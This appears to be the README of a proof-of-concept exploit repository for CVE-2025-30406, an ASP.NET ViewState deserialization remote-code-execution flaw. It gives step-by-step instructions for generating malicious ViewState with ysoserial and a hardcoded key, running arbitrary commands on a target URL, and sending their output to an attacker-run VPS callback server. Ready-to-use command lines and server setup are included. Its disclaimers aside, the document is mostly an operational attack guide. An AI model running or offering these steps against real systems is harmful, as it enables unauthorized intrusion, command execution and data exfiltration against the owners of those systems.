CVE-2025-30406 ViewState Exploit PoC

Overview

This is a Proof-of-Concept (PoC) script demonstrating a ViewState deserialization exploit for CVE-2025-30406 in ASP.NET applications. It uses ysoserial to generate a malicious ViewState payload and sends it to a user-specified URL to execute a provided command. For best results, command output can be exfiltrated to a custom HTTP server (server.py) running on a VPS, which displays results in a styled format with timestamps, green prompts, and white output text. This script is intended for educational purposes only and must only be used on systems where you have explicit permission to perform security testing. Unauthorized use is illegal and unethical.

CVE Details

• CVE ID: CVE-2025-30406
• Description: A deserialization vulnerability in ASP.NET ViewState handling that allows remote code execution when a valid validation key and generator are known.
• Affected Systems: ASP.NET applications with vulnerable ViewState configurations.
• Prerequisites for Exploitation:
  • Access to a valid ViewState validation key and generator.
  • A vulnerable endpoint accepting ViewState parameters.

Repository Contents

• exploit.py: The main PoC script to generate and send the ViewState payload.
• server.py: An HTTP server to receive and display exfiltrated command output in a styled format.
• README.md: This file, with setup and usage instructions.

Prerequisites

• Python 3.x
• requests library (pip install requests)
• ysoserial executable (Windows or equivalent for your platform)
• A vulnerable ASP.NET application endpoint
• A VPS or server to run server.py (recommended for exfiltration)
• Permission to test the target system

Installation

1. Clone this repository:

   git clone https://github.com/yourusername/cve-2025-30406-poc.git
   cd cve-2025-30406-poc

2. Install the required Python package:

   pip install requests

3. Download ysoserial and place it in the same directory as exploit.py or specify its path:
   • ysoserial GitHub

Setup on a VPS (Recommended)

To receive exfiltrated command output in a styled format, run server.py on a VPS:

1. Copy server.py to your VPS (e.g., via scp):

   scp server.py user@your-vps-ip:/home/user/

2. Ensure Python 3 is installed:

   sudo apt update && sudo apt install python3 python3-pip

3. Run the server (default port 8000):

   python3 server.py

4. Ensure the VPS firewall allows inbound traffic on port 8000:

   sudo ufw allow 8000

5. Note the VPS’s public IP or domain (e.g., http://your-vps-ip:8000) for use with the -e flag in exploit.py.

Usage

Running the Exploit

Run exploit.py with the required arguments. The -e flag is optional but highly recommended for exfiltrating command output to server.py for styled display.

python exploit.py -u <target_url> -c <command> [-y <ysoserial_path>] [-e <callback_url>]

Arguments

• -u, --url: Target URL (e.g., http://target.com/page.aspx) [Required]
• -c, --command: Command to execute (e.g., whoami) [Required]
• -y, --ysoserial: Path to ysoserial executable (default: ./ysoserial.exe) [Optional]
• -e, --exfil: Callback URL for exfiltrating command output (e.g., http://your-vps:8000) [Optional]

Examples

1. Run without exfiltration (Blind execution):

   python exploit.py -u http://example.com/loginpage.aspx -c "whoami" -y ./ysoserial.exe

2. Run with exfiltration to a VPS running server.py (recommended):

   python exploit.py -u http://example.com/loginpage.aspx -c "whoami" -y ./ysoserial.exe -e http://your-vps:8000

Running the Server

On your VPS or local machine, start the HTTP server to receive exfiltrated output:

python3 server.py

The server will display command output with timestamps, a green $ prompt, and white text for readability.

How It Works

1. Exploit Script (exploit.py):
   • Uses ysoserial with a hardcoded validation key and generator to create a ViewState payload.
   • If -e is provided, the command is wrapped to capture output and send it to the callback URL via Invoke-WebRequest.
   • Sends the payload to the target URL in a POST request, embedded in the __VIEWSTATE parameter.
   • Prints the server’s response status and a portion of the response body.
2. HTTP Server (server.py):
   • Listens for GET requests containing command output.
   • Decodes the URL path and splits it into lines.
   • Prints each line with a timestamp, green $ prompt, and white output text.
   • Responds with HTTP 200 and “OK”.

Ethical Use Warning

• This script is a proof-of-concept for CVE-2025-30406 for educational and authorized security testing purposes.
• Do not use this script on systems without explicit permission from the system owner.
• Misuse may violate laws, including the Computer Fraud and Abuse Act (CFAA) in the United States or similar laws elsewhere.
• Always obtain written consent before testing any system.
• Report vulnerabilities responsibly through coordinated disclosure or bug bounty programs.

Limitations

• The hardcoded validation key and generator may only work for specific vulnerable applications. Users may need application-specific values.
• The exploit targets ASP.NET applications vulnerable to ViewState deserialization.
• The script assumes the target server processes the ViewState payload correctly.
• Cross-platform compatibility depends on ysoserial availability (primarily Windows-based).
• Exfiltration requires a publicly accessible server for the -e callback URL.

License

This project is licensed under the MIT License. See the LICENSE file for details.

Contact

For questions or feedback, please open an issue on this repository.